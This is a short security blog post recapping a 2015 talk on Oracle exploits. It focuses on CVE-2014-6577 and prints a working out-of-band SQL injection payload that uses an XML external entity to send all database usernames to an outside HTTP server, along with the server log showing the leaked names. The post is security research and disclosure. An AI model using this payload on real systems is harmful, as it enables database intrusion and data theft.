Yesterday I gave my yearly presentation “Best of Oracle Security 2015” at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found/modified released in 2015 in various sources.
One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting 11.2.0.3, 11.2.0.4, 12.1.0.1, 12.1.02, fixed in April 2015 CPU). This bug can be used as helper function in Out-of-band-SQL Injection attacks. Since Oracle 11g the way via utl_http/httpuritype was closed using the ACLs. This exploit opens the possibility in 11g/12g again (if patches are not applied).
—— Out-of-Band SQL Injection Example —————-
http://www.oraexploit.com/id=47′ or 1=extractvalue(xmltype(‚<?xml version=“1.0″ encoding=“UTF-8″?><!DOCTYPE root [ <!ENTITY % remote SYSTEM „http://192.168.83.1:8080/A=’||substr((select sys.stragg(distinct username||‘-‚) as string from all_users),1,220)||'“> %remote; %param1;]>‘),’/l‘)
—
192.168.83.131 – – [18/Nov/2015 00:48:02] „GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0“ 404 –
—— Out-of-Band SQL Injection Example —————-
Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.